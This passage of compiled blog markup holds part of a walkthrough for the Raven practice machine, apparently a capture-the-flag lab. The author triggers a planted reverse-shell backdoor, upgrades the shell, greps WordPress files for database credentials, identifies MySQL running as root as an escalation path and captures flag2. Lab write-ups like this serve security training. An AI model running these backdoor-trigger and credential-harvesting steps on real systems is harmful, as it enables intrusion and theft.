\"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/75609/raven-111855.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": 
\"exploitation\",\n    \"title\": \"exploitation\",\n    \"src\": \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/fcda8/raven-111855.png\",\n    \"srcSet\": [\"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/12f09/raven-111855.png 148w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/e4a3f/raven-111855.png 295w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/fcda8/raven-111855.png 590w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/efc66/raven-111855.png 885w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/75609/raven-111855.png 994w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Great, now I have successfully planted a reverse shell backdoor at \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"http://raven.local/hello.php\"), \".\"), mdx(\"h2\", null, \"Get shell\"), mdx(\"p\", null, \"Now visit this backdoor endpoint:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"curl\"), \" -I -X GET http://raven.local/hello.php\"))), mdx(\"p\", null, \"Unsurprisingly, I have an interactive shell pop out from netcat handler.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": 
\"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/a0f9c6dad9b92709d5cfa4c37d616940/00d43/raven-194601.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAABWElEQVQoz72Ry07CQBSGu6d0YySFlk1npkPCAiOtvYEpFgQSwEKjqEx0wc5HcOHCx9ZOj2kpSgCjxMTFl/9cki8nOYLZ7hz542jhjyIWjCJ2MZqx3uSa9ae37DKcZzmZP7KILdkwus/6wfTui9kd613dLBbLp4fnl1dZQJgE46APw+4AWp0e+EEf3LYPhuWAaXtgWG5W2147y+aZvcOpaYF37oNp2aFQrVaDltsCx3Ji07Riy3K4YZi80TjhzaaRZb1e54QQjjSNI7RDjBF6Q5oGpdJxKCiKGuiUAiYkITm6rie6TldQmtRqtYRSms/3ElNKQVXVUJBlOSCEwMYS0n4f612aa/IDMqGiKKFQLpc/hSQXfse27GfhagmH8O9CTjae81u2hd1Dr9oDz4XT9Ms+QohjjDlCKE7rQ8EYv2OMoVKpjIVCoSBKkmQXi0XvL0iS5IqiKH0A+As07hAHBhgAAAAASUVORK5CYII=')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"shell\",\n    \"title\": \"shell\",\n    \"src\": \"/static/a0f9c6dad9b92709d5cfa4c37d616940/fcda8/raven-194601.png\",\n    \"srcSet\": [\"/static/a0f9c6dad9b92709d5cfa4c37d616940/12f09/raven-194601.png 148w\", \"/static/a0f9c6dad9b92709d5cfa4c37d616940/e4a3f/raven-194601.png 295w\", \"/static/a0f9c6dad9b92709d5cfa4c37d616940/fcda8/raven-194601.png 590w\", \"/static/a0f9c6dad9b92709d5cfa4c37d616940/efc66/raven-194601.png 885w\", 
\"/static/a0f9c6dad9b92709d5cfa4c37d616940/00d43/raven-194601.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Although it\\u2019s a shell, I can\\u2019t use \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"c\"), \" to abort an execution from this shell, it will terminate my netcat program. I still need to upgrade it into a fully functional shell.\"), mdx(\"p\", null, \"Firstly, take advantage of python interpreter to spawn a bash shell:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ python -c \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"\\\"import pty;pty.spawn('/bin/bash')\\\"\")))), mdx(\"p\", null, \"Secondly, hit \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"z\"), \" bring it to background job.\"), mdx(\"p\", null, \"Then:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ stty raw -echo\"))), mdx(\"p\", null, \"And finally, hit \", mdx(\"kbd\", null, \"fg\"), \" and \", mdx(\"kbd\", null, \"Enter\"), \" to bring netcat back to foreground with a fully functional shell.\"), mdx(\"p\", null, \"Futhermore, set terminator 
environment variable:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"export\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token assign-left variable\"\n  }), mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token environment constant\"\n  }), \"TERM\")), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"xterm\"))), mdx(\"p\", null, \"Now, I\u2019m able to use \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"c\"), \" to abort execution inside the compromised machine, or \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"l\"), \" to clear the terminal screen.\"), mdx(\"p\", null, \"Listing current folder:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/00d43/raven-210408.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": 
\"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"files\",\n    \"title\": \"files\",\n    \"src\": \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/fcda8/raven-210408.png\",\n    \"srcSet\": [\"/static/8371f4fc115d53cf7fd04ad67f7ee42f/12f09/raven-210408.png 148w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/e4a3f/raven-210408.png 295w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/fcda8/raven-210408.png 590w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/efc66/raven-210408.png 885w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/00d43/raven-210408.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Based on this output, I can spot several interesting files and folders worth to check out. The first one is \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"Security - Doc\"), \" folder which indicates there is another endpoint \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"http://raven.local/Security - Doc\"), \". 
It turns out, though, that it\u2019s just a static documentation page.\"), mdx(\"p\", null, \"The second one is the \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"wordpress\"), \" folder, which presumably contains some juicy credentials for the database, etc.\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"grep\"), \" -ri db_password wordpress/\"))), mdx(\"p\", null, \"Database password spotted:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/189e72683940ee1d332fe103a1b14ac8/00d43/raven-214446.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: 
\"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"password\",\n    \"title\": \"password\",\n    \"src\": \"/static/189e72683940ee1d332fe103a1b14ac8/fcda8/raven-214446.png\",\n    \"srcSet\": [\"/static/189e72683940ee1d332fe103a1b14ac8/12f09/raven-214446.png 148w\", \"/static/189e72683940ee1d332fe103a1b14ac8/e4a3f/raven-214446.png 295w\", \"/static/189e72683940ee1d332fe103a1b14ac8/fcda8/raven-214446.png 590w\", \"/static/189e72683940ee1d332fe103a1b14ac8/efc66/raven-214446.png 885w\", \"/static/189e72683940ee1d332fe103a1b14ac8/00d43/raven-214446.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"grep\"), \" -ri db_user wordpress/\"))), mdx(\"p\", null, \"Database user spotted:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/fd6e459e9cc9a709a0bc621ef6436852/00d43/reven-215308.png\",\n    \"style\": {\n      
\"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"user\",\n    \"title\": \"user\",\n    \"src\": \"/static/fd6e459e9cc9a709a0bc621ef6436852/fcda8/reven-215308.png\",\n    \"srcSet\": [\"/static/fd6e459e9cc9a709a0bc621ef6436852/12f09/reven-215308.png 148w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/e4a3f/reven-215308.png 295w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/fcda8/reven-215308.png 590w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/efc66/reven-215308.png 885w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/00d43/reven-215308.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Now that I have obtained database credentials I write them down into my Cherrytree notebook to keep all the information that I needed for future privilege escalation organized.\"), mdx(\"p\", null, \"Run \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ps\"), \" to make sure that there is some type of database currently running in this compromised system:\"), 
mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"ps\"), \" -ef \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"|\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"grep\"), \" sql\\nroot       \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"551\"), \"     \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), \" 05:41 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe\\nroot       \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"926\"), \"   \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"551\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), \" 05:41 ?        
00:00:04 /usr/sbin/mysqld --basedir\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"/usr --datadir\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"/var/lib/mysql --plugin-dir\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"/usr/lib/mysql/plugin --user\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"root --log-error\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"/var/log/mysql/error.log --pid-file\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"/var/run/mysqld/mysqld.pid --socket\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), \"/var/run/mysqld/mysqld.sock --port\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"=\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"330\")))), mdx(\"p\", null, \"Run \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"netstat\"), \" to ascertain which interface this MySQL instance is listening on:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"netstat\"), \" -anotp \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  
}, {\n    \"className\": \"token operator\"\n  }), \"|\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"grep\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"3306\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), \"Not all processes could be identified, non-owned process info\\n will not be shown, you would have to be root to see it all.\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\ntcp        \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), \"      \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"127.0\"), \".0.1:3306          \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0.0\"), \".0.0:*               LISTEN      -                off \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0.00\"), \"/0/0\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\")))), mdx(\"p\", null, \"In short, the conclusion is there is a MySQL instance running at port 3306 and listening at the localhost. 
And most importantly, it\\u2019s run by root, which indicates a crucial privesc vector.\"), mdx(\"h4\", null, \"Get flag2\"), mdx(\"p\", null, \"Step into upper directory \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/var/www\"), \" and a regular \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ls -alh\"), \" command:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"cd\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"..\"), \"/ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"&&\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"ls\"), \" -alh\\ntotal 44K\\ndrwxrwxrwx  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), \" root     root     \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), \".0K Jul  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"8\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"10\"), \":06 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \".\"), \"\\ndrwxr-xr-x \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    
\"className\": \"token number\"\n  }), \"12\"), \" root     root     \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), \".0K Aug \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"13\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2018\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"..\"), \"\\n-rw-------  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), \" www-data www-data \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2\"), \".3K Jul  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"8\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"14\"), \":11 .bash_history\\ndrwx------  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2\"), \" www-data www-data \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), \".0K Jul  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"8\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"10\"), \":06 .gnupg\\n-rw-r--r--  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), \" www-data www-data  19K Nov \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"24\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), 
\"2018\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1518\"), \".so\\n-rw-r--r--  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), \" root     root       \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"40\"), \" Nov  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"9\"), \"  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2018\"), \" flag2.txt\\ndrwxrwxrwx \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"10\"), \" root     root     \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), \".0K Jul \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"10\"), \" 06:58 html\"))), mdx(\"p\", null, \"Ta da, flag2 captured. 
I noticed that there is a weird shared library file \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"1518.so\"), \" sitting there; it might be a hint for privesc.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/56ba32923f79fee1b450fd3ebbb2951c/00d43/raven-041344.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"flag2\",\n    \"title\": \"flag2\",\n    \"src\": \"/static/56ba32923f79fee1b450fd3ebbb2951c/fcda8/raven-041344.png\",\n    \"srcSet\": [\"/static/56ba32923f79fee1b450fd3ebbb2951c/12f09/raven-041344.png 148w\", \"/static/56ba32923f79fee1b450fd3ebbb2951c/e4a3f/raven-041344.png 295w\", \"/static/56ba32923f79fee1b450fd3ebbb2951c/fcda8/raven-041344.png 590w\", 